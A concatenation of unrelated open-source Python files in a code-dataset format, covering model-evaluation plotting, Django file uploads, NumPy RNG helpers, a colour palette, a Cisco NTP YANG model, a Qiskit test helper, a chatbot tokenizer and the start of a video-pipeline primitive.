print(f'{metric.capitalize()} Baseline: {round(baseline[metric], 2)} Test: {round(results[metric], 2)} Train: {round(train_results[metric], 2)}')
# Calculate false positive rates and true positive rates
base_fpr, base_tpr, _ = roc_curve(test_labels, [1 for _ in range(len(test_labels))])
model_fpr, model_tpr, _ = roc_curve(test_labels, probs)
plt.figure(figsize = (8, 6))
plt.rcParams['font.size'] = 16
# Plot both curves
plt.plot(base_fpr, base_tpr, 'b', label = 'baseline')
plt.plot(model_fpr, model_tpr, 'r', label = 'model')
plt.legend();
plt.xlabel('False Positive Rate');
plt.ylabel('True Positive Rate'); plt.title('ROC Curves');
plt.show();
evaluate_model(rf_predictions, rf_probs, train_rf_predictions, train_rf_probs)
plt.savefig('roc_auc_curve.png')
from sklearn.metrics import confusion_matrix
import itertools
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Oranges):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
Source: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
# Plot the confusion matrix
plt.figure(figsize = (10, 10))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title, size = 24)
plt.colorbar(aspect=4)
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45, size = 14)
plt.yticks(tick_marks, classes, size = 14)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
# Labeling the plot
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt), fontsize = 20,
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.grid(None)
plt.tight_layout()
plt.ylabel('True label', size = 18)
plt.xlabel('Predicted label', size = 18)
# Confusion matrix
cm = confusion_matrix(test_labels, rf_predictions)
plot_confusion_matrix(cm, classes = ['Poor Health', 'Good Health'],
title = 'Health Confusion Matrix')
plt.savefig('cm.png')
|
leonardo/module/media/utils.py | timgates42/django-leonardo | 102 | 12663918 | <gh_stars>100-1000
from .models import Folder, MEDIA_MODELS
def handle_uploaded_file(file, folder=None, is_public=True):
'''handle uploaded file to folder
match first media type and create media object and returns it
file: File object
folder: str or Folder isinstance
is_public: boolean
'''
_folder = None
if folder and isinstance(folder, Folder):
_folder = folder
elif folder:
_folder, folder_created = Folder.objects.get_or_create(
name=folder)
for cls in MEDIA_MODELS:
if cls.matches_file_type(file.name):
obj, created = cls.objects.get_or_create(
original_filename=file.name,
file=file,
folder=_folder,
is_public=is_public)
if created:
return obj
return None
def handle_uploaded_files(files, folder=None, is_public=True):
'''handle uploaded files to folder
files: array of File objects or single object
folder: str or Folder isinstance
is_public: boolean
'''
results = []
for f in files:
result = handle_uploaded_file(f, folder, is_public)
results.append(result)
return results
|
cardio/dataset/dataset/utils_random.py | lbdvriesGT/cardio | 101 | 12663965 | <gh_stars>100-1000
""" contains data utils """
import warnings
import numpy as np
def make_rng(seed=None):
""" Create a random number generator
Parameters
----------
seed : bool, int, Generator, BitGenerator, RandomState
a random state
- False - returns None
- None or True - creates a new SFC64 generator with random entropy
- int - creates a new SFC64 generator with the seed given
- SeedSequence - creates a new SFC64 generator with the seed given
- Generator - returns it
- BitGenerator - creates a new generator
- RandomState - returns it
Notes
-----
Do not use a legacy RandomState unless for backward compatibility.
Returns
-------
numpy.random.Generator
"""
if seed is False:
rng = None
elif seed is None or seed is True:
rng = np.random.default_rng(np.random.SFC64())
elif isinstance(seed, np.random.SeedSequence):
rng = np.random.default_rng(np.random.SFC64(seed))
elif isinstance(seed, int):
rng = np.random.default_rng(np.random.SFC64(seed))
elif isinstance(seed, np.random.Generator):
rng = seed
elif isinstance(seed, np.random.BitGenerator):
rng = np.random.default_rng(seed)
elif isinstance(seed, np.random.RandomState):
rng = seed
else:
warnings.warn("Unknown seed type: %s" % seed)
rng = None
return rng
def make_seed_sequence(shuffle=False):
""" Create a seed sequence for random number generation
Parameters
----------
shuffle : bool or int or object with a seed sequence attribute
a random state
- False or True - creates a new seed sequence with random entropy
- int - creates a new seed sequence with the given entropy
Returns
-------
numpy.random.SeedSequence
"""
if isinstance(getattr(shuffle, 'random_seed', None), np.random.SeedSequence):
return shuffle.random_seed
if shuffle is None or isinstance(shuffle, bool):
seed = np.random.SeedSequence()
elif isinstance(shuffle, int):
if shuffle >= 0:
seed = np.random.SeedSequence(shuffle)
else:
# if shuffle is negative, do not shuffle the dataset, but use the seed for randomization
seed = np.random.SeedSequence(-shuffle)
else:
raise TypeError('shuffle can be bool or int', shuffle)
return seed
def spawn_seed_sequence(source):
""" Return a new seed sequence or None
Parameters
----------
source : numpy.random.SeedSequence or Batch or Pipeline
Returns
-------
numpy.random.SeedSequence
"""
if isinstance(source, np.random.SeedSequence):
pass
elif isinstance(getattr(source, 'random_seed', None), np.random.SeedSequence):
source = source.random_seed
else:
raise ValueError('source should be SeedSequence, Batch or Pipeline, but given %s' % type(source))
return source.spawn(1)[0]
|
external-deps/qdarkstyle/qdarkstyle/colorsystem.py | Earthman100/spyder | 7,956 | 12663992 | # colorsystem.py is the full list of colors that can be used to easily create themes.
class Gray:
B0 = '#000000'
B10 = '#19232D'
B20 = '#293544'
B30 = '#37414F'
B40 = '#455364'
B50 = '#54687A'
B60 = '#60798B'
B70 = '#788D9C'
B80 = '#9DA9B5'
B90 = '#ACB1B6'
B100 = '#B9BDC1'
B110 = '#C9CDD0'
B120 = '#CED1D4'
B130 = '#E0E1E3'
B140 = '#FAFAFA'
B150 = '#FFFFFF'
class Blue:
B0 = '#000000'
B10 = '#062647'
B20 = '#26486B'
B30 = '#375A7F'
B40 = '#346792'
B50 = '#1A72BB'
B60 = '#057DCE'
B70 = '#259AE9'
B80 = '#37AEFE'
B90 = '#73C7FF'
B100 = '#9FCBFF'
B110 = '#C2DFFA'
B120 = '#CEE8FF'
B130 = '#DAEDFF'
B140 = '#F5FAFF'
B150 = '##FFFFFF'
|
cisco-ios-xr/ydk/models/cisco_ios_xr/ntp.py | CiscoDevNet/ydk-py | 177 | 12664007 | <gh_stars>100-1000
""" ntp
This module contains definitions
for the Calvados model objects.
This module contains a collection of YANG definitions
for Cisco IOS\-XR syadmin NTP configuration.
This module contains definitions
for the following management objects\:
NTP configuration data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
Copyright (c) 2012\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ntp(_Entity_):
"""
.. attribute:: peer
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.ntp.Ntp.Peer>`
.. attribute:: server
**type**\: list of :py:class:`Server <ydk.models.cisco_ios_xr.ntp.Ntp.Server>`
.. attribute:: trusted_key
**type**\: list of int
**range:** 1..65534
.. attribute:: authenticate
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: authentication_key
**type**\: list of :py:class:`AuthenticationKey <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey>`
.. attribute:: trace
**type**\: :py:class:`Trace <ydk.models.cisco_ios_xr.ntp.Ntp.Trace>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp, self).__init__()
self._top_entity = None
self.yang_name = "ntp"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("peer", ("peer", Ntp.Peer)), ("server", ("server", Ntp.Server)), ("authentication-key", ("authentication_key", Ntp.AuthenticationKey)), ("trace", ("trace", Ntp.Trace))])
self._leafs = OrderedDict([
('trusted_key', (YLeafList(YType.int32, 'trusted-key'), ['int'])),
('authenticate', (YLeaf(YType.empty, 'authenticate'), ['Empty'])),
])
self.trusted_key = []
self.authenticate = None
self.trace = Ntp.Trace()
self.trace.parent = self
self._children_name_map["trace"] = "trace"
self.peer = YList(self)
self.server = YList(self)
self.authentication_key = YList(self)
self._segment_path = lambda: "ntp:ntp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp, ['trusted_key', 'authenticate'], name, value)
class Peer(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "peer" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Peer, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Peer']['meta_info']
class Server(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Server, self).__init__()
self.yang_name = "server"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "server" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Server, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Server']['meta_info']
class AuthenticationKey(_Entity_):
"""
.. attribute:: key_number (key)
**type**\: int
**range:** 1..65534
.. attribute:: md5_keyword
**type**\: :py:class:`Md5Keyword <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Md5Keyword>`
**mandatory**\: True
.. attribute:: encryption
**type**\: :py:class:`Encryption <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Encryption>`
.. attribute:: keyname
**type**\: str
**length:** 0..32
**mandatory**\: True
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.AuthenticationKey, self).__init__()
self.yang_name = "authentication-key"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['key_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_number', (YLeaf(YType.int32, 'key-number'), ['int'])),
('md5_keyword', (YLeaf(YType.enumeration, 'md5-keyword'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Md5Keyword')])),
('encryption', (YLeaf(YType.enumeration, 'encryption'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Encryption')])),
('keyname', (YLeaf(YType.str, 'keyname'), ['str'])),
])
self.key_number = None
self.md5_keyword = None
self.encryption = None
self.keyname = None
self._segment_path = lambda: "authentication-key" + "[key-number='" + str(self.key_number) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.AuthenticationKey, ['key_number', 'md5_keyword', 'encryption', 'keyname'], name, value)
class Encryption(Enum):
"""
Encryption (Enum Class)
.. data:: clear = 0
.. data:: encrypted = 1
"""
clear = Enum.YLeaf(0, "clear")
encrypted = Enum.YLeaf(1, "encrypted")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Encryption']
class Md5Keyword(Enum):
"""
Md5Keyword (Enum Class)
.. data:: md5 = 0
"""
md5 = Enum.YLeaf(0, "md5")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Md5Keyword']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey']['meta_info']
class Trace(_Entity_):
"""
.. attribute:: ntp_helper
**type**\: :py:class:`NtpHelper <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ntp_helper", ("ntp_helper", Ntp.Trace.NtpHelper))])
self._leafs = OrderedDict()
self.ntp_helper = Ntp.Trace.NtpHelper()
self.ntp_helper.parent = self
self._children_name_map["ntp_helper"] = "ntp_helper"
self._segment_path = lambda: "trace"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace, [], name, value)
class NtpHelper(_Entity_):
"""
.. attribute:: trace
show traceable processes
**type**\: list of :py:class:`Trace_ <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper, self).__init__()
self.yang_name = "ntp_helper"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("trace", ("trace", Ntp.Trace.NtpHelper.Trace_))])
self._leafs = OrderedDict()
self.trace = YList(self)
self._segment_path = lambda: "ntp_helper"
self._absolute_path = lambda: "ntp:ntp/trace/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper, [], name, value)
class Trace_(_Entity_):
"""
show traceable processes
.. attribute:: buffer (key)
**type**\: str
**config**\: False
.. attribute:: location
**type**\: list of :py:class:`Location <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp_helper"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['buffer']
self._child_classes = OrderedDict([("location", ("location", Ntp.Trace.NtpHelper.Trace_.Location))])
self._leafs = OrderedDict([
('buffer', (YLeaf(YType.str, 'buffer'), ['str'])),
])
self.buffer = None
self.location = YList(self)
self._segment_path = lambda: "trace" + "[buffer='" + str(self.buffer) + "']"
self._absolute_path = lambda: "ntp:ntp/trace/ntp_helper/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_, ['buffer'], name, value)
class Location(_Entity_):
"""
.. attribute:: location_name (key)
**type**\: str
**config**\: False
.. attribute:: all_options
**type**\: list of :py:class:`AllOptions <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location, self).__init__()
self.yang_name = "location"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['location_name']
self._child_classes = OrderedDict([("all-options", ("all_options", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions))])
self._leafs = OrderedDict([
('location_name', (YLeaf(YType.str, 'location_name'), ['str'])),
])
self.location_name = None
self.all_options = YList(self)
self._segment_path = lambda: "location" + "[location_name='" + str(self.location_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location, ['location_name'], name, value)
class AllOptions(_Entity_):
"""
.. attribute:: option (key)
**type**\: str
**config**\: False
.. attribute:: trace_blocks
**type**\: list of :py:class:`TraceBlocks <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, self).__init__()
self.yang_name = "all-options"
self.yang_parent_name = "location"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['option']
self._child_classes = OrderedDict([("trace-blocks", ("trace_blocks", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks))])
self._leafs = OrderedDict([
('option', (YLeaf(YType.str, 'option'), ['str'])),
])
self.option = None
self.trace_blocks = YList(self)
self._segment_path = lambda: "all-options" + "[option='" + str(self.option) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, ['option'], name, value)
class TraceBlocks(_Entity_):
"""
.. attribute:: data
Trace output block
**type**\: str
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, self).__init__()
self.yang_name = "trace-blocks"
self.yang_parent_name = "all-options"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('data', (YLeaf(YType.str, 'data'), ['str'])),
])
self.data = None
self._segment_path = lambda: "trace-blocks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, ['data'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace']['meta_info']
def clone_ptr(self):
self._top_entity = Ntp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp']['meta_info']
class ClockAction(_Entity_):
"""
.. attribute:: clock
**type**\: :py:class:`Clock <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction, self).__init__()
self._top_entity = None
self.yang_name = "clock-action"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("clock", ("clock", ClockAction.Clock))])
self._leafs = OrderedDict()
self.clock = ClockAction.Clock()
self.clock.parent = self
self._children_name_map["clock"] = "clock"
self._segment_path = lambda: "ntp:clock-action"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction, [], name, value)
class Clock(_Entity_):
"""
.. attribute:: action
**type**\: :py:class:`Action <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock.Action>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock, self).__init__()
self.yang_name = "clock"
self.yang_parent_name = "clock-action"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("Action", ("action", ClockAction.Clock.Action))])
self._leafs = OrderedDict()
self.action = ClockAction.Clock.Action()
self.action.parent = self
self._children_name_map["action"] = "Action"
self._segment_path = lambda: "clock"
self._absolute_path = lambda: "ntp:clock-action/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction.Clock, [], name, value)
class Action(_Entity_):
"""
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock.Action, self).__init__()
self.yang_name = "Action"
self.yang_parent_name = "clock"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self._segment_path = lambda: "Action"
self._absolute_path = lambda: "ntp:clock-action/clock/%s" % self._segment_path()
self._is_frozen = True
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock.Action']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock']['meta_info']
def clone_ptr(self):
self._top_entity = ClockAction()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction']['meta_info']
|
test/circuit/library/ansatzes/utils/vibrational_op_label_creator.py | jschuhmac/qiskit-nature | 132 | 12664035 | <gh_stars>100-1000
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Some utility methods which were removed but are still required for some unit-tests."""
from typing import List, Tuple
def _create_labels(
boson_hamilt_harm_basis: List[List[Tuple[List[List[int]], complex]]]
) -> List[Tuple[str, complex]]:
all_labels = []
for num_body_data in boson_hamilt_harm_basis:
num_body_labels = _create_num_body_labels(num_body_data)
all_labels.extend(num_body_labels)
return all_labels
def _create_num_body_labels(
num_body_data: List[Tuple[List[List[int]], complex]]
) -> List[Tuple[str, complex]]:
num_body_labels = []
for indices, coeff in num_body_data:
indices.sort()
coeff_label = _create_label_for_coeff(indices)
num_body_labels.append((coeff_label, coeff))
return num_body_labels
def _create_label_for_coeff(indices: List[List[int]]) -> str:
complete_labels_list = []
for mode, modal_raise, modal_lower in indices:
if modal_raise <= modal_lower:
complete_labels_list.append(f"+_{mode}*{modal_raise}")
complete_labels_list.append(f"-_{mode}*{modal_lower}")
else:
complete_labels_list.append(f"-_{mode}*{modal_lower}")
complete_labels_list.append(f"+_{mode}*{modal_raise}")
complete_label = " ".join(complete_labels_list)
return complete_label
|
rnn/chatbot/seq2seq_conversation_model/tokenizer.py | llichengtong/yx4 | 128 | 12664047 | # coding=utf8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import re
import sys
from tensorflow.python.platform import gfile
from settings import VOCAB_DICT_FILE
_PAD = "_PAD"
_GO = "_GO"
_EOS = "_EOS"
_UNK = "_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile("([.,!?\"':;)(])")
_DIGIT_RE = re.compile(r"\d")
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(re.split(_WORD_SPLIT, space_separated_fragment))
return [w.decode('utf8') for w in words if w]
# forward maximum matching word segmentation
_DICT = None
_MAX_WORD_LENGTH = 0
def fmm_tokenizer(sentence):
global _DICT
global _MAX_WORD_LENGTH
if not _DICT:
_DICT, _ = initialize_vocabulary(VOCAB_DICT_FILE)
for v in _DICT:
if len(v) > _MAX_WORD_LENGTH:
_MAX_WORD_LENGTH = len(v)
print(_MAX_WORD_LENGTH)
words = []
begin = 0
while begin < len(sentence):
end = min(begin + _MAX_WORD_LENGTH, len(sentence))
while end > begin + 1:
word = sentence[begin: end]
# print (word)
if word in _DICT:
break
end -= 1
word = sentence[begin: end]
words.append(word.encode('utf8'))
begin = end
return words
def create_vocabulary(vocabulary_path, data_path_patterns, max_vocabulary_size,
tokenizer=None, normalize_digits=True):
"""Create vocabulary file (if it does not exist yet) from data file.
Data file is assumed to contain one sentence per line. Each sentence is
tokenized and digits are normalized (if normalize_digits is set).
Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
We write it to vocabulary_path in a one-token-per-line format, so that later
token in the first line gets id=0, second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
data_path: data file that will be used to create vocabulary.
max_vocabulary_size: limit on the size of the created vocabulary.
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
vocab = {}
if gfile.Exists(vocabulary_path):
sys.stderr.write(
'vocabulary path %s exsit. we will use the exised one\n' % vocabulary_path)
return
for data_f in glob.glob(data_path_patterns):
print("Creating vocabulary %s from data %s" % (vocabulary_path, data_f))
with gfile.GFile(data_f, mode="r") as f:
counter = 0
for line in f:
counter += 1
if counter % 100000 == 0:
print(" processing line %d" % counter)
tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)
for w in tokens:
word = re.sub(_DIGIT_RE, "0", w) if normalize_digits else w
if word in vocab:
vocab[word] += 1
else:
vocab[word] = 1
print('total vaca size: %s' % len(vocab))
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)
if len(vocab_list) > max_vocabulary_size:
vocab_list = vocab_list[:max_vocabulary_size]
with gfile.GFile(vocabulary_path, mode="w") as vocab_file:
for w in vocab_list:
vocab_file.write(w + "\n")
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="r") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip().decode('utf8') for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError("Vocabulary file %s not found.", vocabulary_path)
|
autovideo/common/denormalize.py | HuaizhengZhang/autovideo | 233 | 12664088 | <reponame>HuaizhengZhang/autovideo
'''
Copyright 2021 D3M Team
Copyright (c) 2021 DATA Lab at Texas A&M University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import typing
import itertools
import numpy # type: ignore
import pandas # type: ignore
from d3m import container, exceptions, utils as d3m_utils
from d3m.base import utils as base_utils
from d3m.metadata import base as metadata_base, hyperparams
from d3m.primitive_interfaces import base, transformer
__all__ = ('DenormalizePrimitive',)
Inputs = container.Dataset
Outputs = container.Dataset
class Hyperparams(hyperparams.Hyperparams):
starting_resource = hyperparams.Hyperparameter[typing.Union[str, None]](
default=None,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="From which resource to start denormalizing. If \"None\" then it starts from the dataset entry point.",
)
